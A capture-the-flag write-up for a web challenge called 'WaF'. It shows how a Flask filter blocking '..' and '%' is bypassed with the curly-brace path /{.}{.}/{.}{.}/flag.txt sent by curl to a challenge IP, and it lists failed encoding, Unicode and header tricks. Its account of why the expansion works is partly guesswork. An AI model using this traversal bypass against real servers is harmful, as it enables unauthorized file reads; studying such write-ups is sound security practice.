WaF - Web Challenge Writeup#

Accessing the Web Application#

When we visit the main page, we see a simple HTML form:

1
<!DOCTYPE html>
2
<html>
3
<head>
4
  <meta charset="UTF-8">
5
  <title>Bee</title>
6
</head>
7
<body>
8
  <p>Input your name:</p>
9
  <form action="/huraaaaa.html" method="GET">
10
    <input a="{a}" type="text" required>
11
    <button type="submit">Submit</button>
12
  </form>
13

14
  <!-- @app.after_request
15
    def index(filename: str = "index.html"):
16
    if ".." in filename or "%" in filename:
17
        return "No no not like that :("
18
    -->
19
</body>
20
</html>

Key Observations#

1. HTML Comment Leak: The source code reveals a Flask @app.after_request function that filters requests
2. WAF Rules: The application blocks any filename containing ".." or "%"
3. Interesting Response: Direct access to /flag.txt returns "Something wrong!!"

Testing Basic Paths#

1
# Direct flag access
2
curl http://45.56.66.96:7789/flag.txt
3
# Returns: Something wrong!!
4

5
# Known working endpoints
6
curl http://45.56.66.96:7789/index.html  # Works
7
curl http://45.56.66.96:7789/hello.html  # Works

WAF Bypass Research#

The challenge title “WaF” suggests we need to bypass a Web Application Firewall. The HTML comment reveals:

1
if ".." in filename or "%" in filename:
2
    return "No no not like that :("

This means:

• Path traversal with .. is blocked
• URL encoding with % is blocked
• The filter checks the literal strings ".." and "%"

The Hint#

The author’s Discord hint was crucial: “no need for any parameters”

This suggests:

1. We shouldn’t use query parameters like ?file=flag.txt
2. The bypass must be in the URL path itself
3. We need to find a way to traverse directories without using .. or %

Curly Brace Expansion Bypass#

In some web servers and frameworks (like Flask with certain configurations), curly braces {} can be used for glob pattern matching or path expansion:

• {.} can expand to . (single dot)
• {.}{.} expands to .. (two dots) without containing the literal string ”..”

This bypasses the WAF because:

1. The string "{.}{.}" doesn’t contain ".."
2. The server processes it AFTER the WAF check
3. The expansion happens at the filesystem level

Path Traversal Without ”..”#

To reach the root directory and access flag.txt, we can use:

1
/{.}{.}/{.}{.}/flag.txt

This expands to:

1
/../../flag.txt

But crucially, the WAF only sees {.}{.} which doesn’t match its filter!

Final Payload#

1
curl http://45.56.66.96:7789/{.}{.}/{.}{.}/flag.txt

Response#

1
KCTF{7fdbbcd6c3cee0ae65c5ca327c14a25f6e473d1c}

Why This Works#

1. Flask Static File Handling: Flask’s send_file() or similar functions process the path
2. Glob Pattern Expansion: The {.} pattern is expanded by the underlying filesystem or glob library
3. Order of Operations:

   1
   Request → WAF Check (sees {.}{.}) → Path Expansion (becomes ..) → File Access
   

Alternative Bypass Attempts (Failed)#

We tried many other techniques that didn’t work:

1. URL Encoding Variations:

   • %2e%2e (blocked by % filter)
   • Double encoding %252e (still contains %)

2. Unicode Normalization:

   • Fullwidth dot ． (U+FF0E)
   • One dot leader ․ (U+2024)
   • These didn’t expand properly

3. Path Variations:

   • /./flag.txt (no traversal)
   • //flag.txt (no traversal)
   • /proc/self/cwd/flag.txt (incorrect path)

4. HTTP Header Tricks:

   • X-Original-URL
   • X-Rewrite-URL
   • Different HTTP methods (POST, PUT, HEAD)

5. Query Parameters:

   • Author explicitly said “no need for any parameters”
   • All attempts with ?file=, ?path=, etc. returned errors